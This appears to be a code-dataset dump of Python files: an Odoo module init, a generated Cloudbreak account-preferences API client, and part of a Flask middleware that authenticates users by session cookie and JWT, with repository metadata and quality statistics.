hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4cb9874c6e8040d1d49fb16e53085ae6696afc16
| 188
|
py
|
Python
|
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
# © 2015-2020 Deltatech
# See README.rst file on addons root folder for license details
from . import account_payment
from . import account_journal
from . import account_bank_statement
| 23.5
| 63
| 0.797872
| 28
| 188
| 5.25
| 0.785714
| 0.204082
| 0.346939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 0.159574
| 188
| 7
| 64
| 26.857143
| 0.873418
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
98079364bc302a03a77299e4ab18353dfada647d
| 23,418
|
py
|
Python
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 30
|
2017-06-12T13:05:24.000Z
|
2021-08-03T09:00:48.000Z
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 6
|
2017-12-27T23:12:45.000Z
|
2019-03-07T22:14:24.000Z
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 31
|
2017-06-12T13:05:28.000Z
|
2019-09-20T01:50:29.000Z
|
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class V1accountpreferencesApi(object):
    """
    Client for the Cloudbreak ``/v1/accountpreferences`` endpoints.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Use the caller-supplied client when given; otherwise fall back to
        # (and lazily create) the client held by the shared Configuration.
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def get_account_preferences_endpoint(self, **kwargs):
        """
        retrieve account preferences for admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_account_preferences_endpoint(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin dispatcher: always ask the *_with_http_info variant for data
        # only; with a `callback` the call is async and the request thread is
        # returned instead of the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_account_preferences_endpoint_with_http_info(**kwargs)
        else:
            (data) = self.get_account_preferences_endpoint_with_http_info(**kwargs)
            return data

    def get_account_preferences_endpoint_with_http_info(self, **kwargs):
        """
        retrieve account preferences for admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_account_preferences_endpoint_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_account_preferences_endpoint" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['tokenAuth']

        return self.api_client.call_api('/v1/accountpreferences', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AccountPreferencesResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def is_platform_selection_disabled(self, **kwargs):
        """
        is platform selection disabled
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.is_platform_selection_disabled(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: dict(str, bool)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin dispatcher; see get_account_preferences_endpoint for the
        # sync/async convention.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.is_platform_selection_disabled_with_http_info(**kwargs)
        else:
            (data) = self.is_platform_selection_disabled_with_http_info(**kwargs)
            return data

    def is_platform_selection_disabled_with_http_info(self, **kwargs):
        """
        is platform selection disabled
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.is_platform_selection_disabled_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: dict(str, bool)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method is_platform_selection_disabled" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['tokenAuth']

        return self.api_client.call_api('/v1/accountpreferences/isplatformselectiondisabled', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='dict(str, bool)',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def platform_enablement(self, **kwargs):
        """
        is platform selection enabled
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.platform_enablement(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: dict(str, bool)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin dispatcher; see get_account_preferences_endpoint for the
        # sync/async convention.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.platform_enablement_with_http_info(**kwargs)
        else:
            (data) = self.platform_enablement_with_http_info(**kwargs)
            return data

    def platform_enablement_with_http_info(self, **kwargs):
        """
        is platform selection enabled
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.platform_enablement_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: dict(str, bool)
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method platform_enablement" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['tokenAuth']

        return self.api_client.call_api('/v1/accountpreferences/platformenabled', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='dict(str, bool)',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def post_account_preferences_endpoint(self, **kwargs):
        """
        post account preferences of admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_account_preferences_endpoint(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param AccountPreferencesRequest body:
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin dispatcher; see get_account_preferences_endpoint for the
        # sync/async convention.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.post_account_preferences_endpoint_with_http_info(**kwargs)
        else:
            (data) = self.post_account_preferences_endpoint_with_http_info(**kwargs)
            return data

    def post_account_preferences_endpoint_with_http_info(self, **kwargs):
        """
        post account preferences of admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_account_preferences_endpoint_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param AccountPreferencesRequest body:
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_account_preferences_endpoint" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # The request body is optional; forward it only when supplied.
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['tokenAuth']

        return self.api_client.call_api('/v1/accountpreferences', 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AccountPreferencesResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def put_account_preferences_endpoint(self, **kwargs):
        """
        update account preferences of admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.put_account_preferences_endpoint(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param AccountPreferencesRequest body:
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin dispatcher; see get_account_preferences_endpoint for the
        # sync/async convention.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.put_account_preferences_endpoint_with_http_info(**kwargs)
        else:
            (data) = self.put_account_preferences_endpoint_with_http_info(**kwargs)
            return data

    def put_account_preferences_endpoint_with_http_info(self, **kwargs):
        """
        update account preferences of admin user
        Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.put_account_preferences_endpoint_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param AccountPreferencesRequest body:
        :return: AccountPreferencesResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument the endpoint does not recognise.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method put_account_preferences_endpoint" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # The request body is optional; forward it only when supplied.
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['tokenAuth']

        return self.api_client.call_api('/v1/accountpreferences', 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AccountPreferencesResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
| 43.206642
| 984
| 0.590529
| 2,322
| 23,418
| 5.729113
| 0.105512
| 0.060137
| 0.041043
| 0.027062
| 0.900849
| 0.881906
| 0.881906
| 0.864542
| 0.854168
| 0.845599
| 0
| 0.000776
| 0.339611
| 23,418
| 541
| 985
| 43.286506
| 0.859425
| 0.379195
| 0
| 0.807692
| 0
| 0
| 0.138452
| 0.052328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042308
| false
| 0
| 0.026923
| 0
| 0.130769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e24d5584c8a27007fc5a436027f4c7c4cb24732d
| 12,670
|
py
|
Python
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | 2
|
2020-01-18T04:59:29.000Z
|
2020-01-20T23:16:58.000Z
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | 1
|
2022-02-10T20:55:13.000Z
|
2022-02-10T20:55:13.000Z
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------------------------------------------------
# arclytics_sim
# middleware.py
#
# Attributions:
# [1]
# ----------------------------------------------------------------------------------------------------------------------
__author__ = [
'Andrew Che <@codeninja55>', 'David Matthews <@tree1004>',
'Dinol Shrestha <@dinolsth>'
]
__license__ = 'MIT'
__version__ = '1.0.0'
__status__ = 'production'
__date__ = '2019.07.06'
"""middleware.py:
This is the request middleware that ensures every single request is checked
for cookies and authentication or authorisation based on the endpoint View
methods used.
"""
from functools import wraps
from threading import Thread
from bson import ObjectId
from flask import json, jsonify, request, session
from mongoengine import DoesNotExist
from arc_logging import AppLogger
from sim_api.extensions.Session.redis_session import SESSION_COOKIE_NAME
from sim_api.extensions import apm
from sim_api.models import User
from sim_api.auth_service import AuthService
logger = AppLogger(__name__)
def async_func(f):
    """Threading decorator if you want to make a method use separate thread.

    Args:
        f: the callable to run asynchronously.

    Returns:
        A wrapper that starts ``f(*args, **kwargs)`` on a new ``Thread`` and
        returns that thread, so callers may ``join()`` it when they need to
        wait for completion. (Backward compatible: the previous wrapper
        returned ``None``, which callers necessarily ignored.)
    """
    @wraps(f)
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        # Hand the thread back so the caller can synchronise on it.
        return thr
    return wrapper
# ========================== # FLASK VERSIONS # ============================= #
def authenticate_user_and_cookie_flask(f):
    """A wrapper decorator as a middleware to authenticate if the user has a
    cookie in their request. This will check the cookie and session is available
    for the user before it allows any actions on the back-end.

    Args:
        f: the endpoint View method to run that is being wrapped.

    Returns:
        the `sim_api.models.User` object if found.
    """
    @wraps(f)
    def wrapped(*args, **kwargs):
        payload = {'status': 'fail', 'message': 'Session token is not valid.'}

        # The session id must arrive as a cookie under our configured name.
        if not request.cookies.get(SESSION_COOKIE_NAME):
            return jsonify(payload), 401
        if not session:
            payload['message'] = 'Session is invalid.'
            return jsonify(payload), 401

        # The JWT was placed in the session at login time.
        token = session.get('jwt', None)
        if token is None:
            payload['message'] = 'No JWT stored in Session.'
            return jsonify(payload), 500

        # decode_auth_token() yields a bson.ObjectId on success, otherwise a
        # human-readable error string from the raised exception.
        decoded = AuthService().decode_auth_token(auth_token=token)
        if not isinstance(decoded, ObjectId):
            payload['message'] = decoded
            return jsonify(payload), 401

        # The id must map to an existing, active user.
        try:
            user = User.objects.get(id=decoded)
        except DoesNotExist as e:
            payload['error'] = str(e)
            payload['message'] = 'User does not exist.'
            logger.exception(payload['message'])
            apm.capture_exception()
            return jsonify(payload), 404

        if not user.active:
            payload['message'] = 'This user account has been disabled.'
            log_blob = {"message": payload['message'], "user": user.email}
            logger.info(json.dumps(log_blob))
            apm.capture_message('Unauthorised access.')
            return jsonify(payload), 403

        # Authenticated: hand the user object through to the endpoint.
        return f(user, *args, **kwargs)

    return wrapped
def authorize_admin_cookie_flask(f):
    """A wrapper decorator as a middleware to authenticate if the user has a
    cookie in their request. This will check the cookie and session is
    available for the user before it allows any actions on the back-end.
    Additionally, it also checks if the user is an admin and allows to perform
    actions on admin authorized endpoints.

    Args:
        f: the endpoint View method to run that is being wrapped.

    Returns:
        the `sim_api.models.User` object if found.
    """
    @wraps(f)
    def decorated_func(*args, **kwargs):
        response = {'status': 'fail', 'message': 'Session token is not valid.'}
        # Get the session key from the cookies
        session_key = request.cookies.get(SESSION_COOKIE_NAME)
        if not session_key:
            return jsonify(response), 401
        if not session:
            response['message'] = 'Session is invalid.'
            return jsonify(response), 401
        # Extract the JWT from the session which we stored at login
        auth_token = session.get('jwt', None)
        if auth_token is None:
            response['message'] = 'No JWT stored in Session.'
            return jsonify(response), 500
        # Decode either returns bson.ObjectId if successful or a string
        # from an exception
        resp = AuthService().decode_auth_token(auth_token=auth_token)
        # Either returns an ObjectId User ID or a string response.
        if not isinstance(resp, ObjectId):
            response['message'] = resp
            logger.info(resp)
            apm.capture_message('Invalid Auth token.')
            return jsonify(response), 401
        # Validate the user is active
        try:
            user = User.objects.get(id=resp)
        except DoesNotExist as e:
            response['error'] = str(e)
            response['message'] = 'User does not exist.'
            # logger.exception() records the active exception's traceback by
            # itself; the redundant exc_info=True was removed so this call is
            # consistent with the sibling decorators in this module.
            logger.exception(response['message'])
            apm.capture_exception()
            return jsonify(response), 404
        if not user.active:
            response['message'] = 'This user account has been disabled.'
            logger.info(
                json.dumps(
                    {
                        "message": response['message'],
                        "user": user.email
                    }
                )
            )
            apm.capture_message('Unauthorised access.')
            return jsonify(response), 403
        # Admin-only endpoint: reject authenticated non-admin users.
        if not user.is_admin:
            response['message'] = 'Not authorized.'
            logger.info(
                json.dumps(
                    {
                        "message": response['message'],
                        "user": user.email
                    }
                )
            )
            # Must capture message because there is no exception in this
            # case which is a bug if Python APM Agent.
            # https://github.com/elastic/apm-agent-python/issues/599
            apm.capture_message('Unauthorised admin access.')
            return jsonify(response), 403
        return f(user, *args, **kwargs)
    return decorated_func
# ======================== # RESTFUL VERSIONS # ============================= #
def authenticate_user_cookie_restful(f):
    """A wrapper decorator as a middleware to authenticate if the user has a
    cookie in their request. This will check the cookie and session is available
    for the user before it allows any actions on the back-end.

    Args:
        f: the endpoint View method to run that is being wrapped.

    Returns:
        the `sim_api.models.User` object if found.
    """
    @wraps(f)
    def inner(*args, **kwargs):
        # RESTful variant: returns plain (dict, status) tuples rather than
        # jsonify()-wrapped responses.
        body = {'status': 'fail', 'message': 'Session token is not valid.'}

        # The session id must arrive as a cookie under our configured name.
        if not request.cookies.get(SESSION_COOKIE_NAME):
            return body, 401
        if not session:
            body['message'] = 'Session is invalid.'
            return body, 401

        # The JWT was placed in the session at login time.
        jwt_token = session.get('jwt', None)
        if jwt_token is None:
            body['message'] = 'No JWT stored in Session.'
            return body, 500

        # decode_auth_token() yields a bson.ObjectId on success, otherwise a
        # human-readable error string from the raised exception.
        uid = AuthService().decode_auth_token(auth_token=jwt_token)
        if not isinstance(uid, ObjectId):
            body['message'] = uid
            return body, 401

        # The id must map to an existing, active user.
        try:
            user = User.objects.get(id=uid)
        except DoesNotExist as e:
            body['error'] = str(e)
            body['message'] = 'User does not exist.'
            logger.exception(body['message'])
            apm.capture_exception()
            return body, 404

        if not user.active:
            body['message'] = 'This user account has been disabled.'
            logger.info(
